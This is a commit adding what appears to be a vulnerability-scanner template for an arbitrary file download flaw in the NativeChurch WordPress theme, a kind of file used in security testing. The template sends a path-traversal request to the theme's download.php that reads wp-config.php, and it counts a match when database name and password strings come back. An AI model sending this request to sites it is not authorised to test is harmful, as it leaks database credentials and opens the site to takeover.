Create nativechurch-wp-theme-lfd.yaml

2021-07-15 18:41:08 +09:00 · 2021-07-15 18:41:08 +09:00 · b5d66a1915
parent 675fc0eabe
commit b5d66a1915
1 changed files with 27 additions and 0 deletions
--- a/nativechurch-wp-theme-lfd.yaml
+++ b/nativechurch-wp-theme-lfd.yaml
@ -0,0 +1,27 @@
+id: nativechurch-wp-theme-lfd
+
+info:
+  name: WordPress NativeChurch Theme Arbitrary File Download
+  author: 0x_Akoko
+  severity: high
+  tags: wordpress,wp-theme,lfi
+  description: A LFD Bug In download.php File In NativeChurch Theme And Make Site Vulnerable.
+  reference: https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200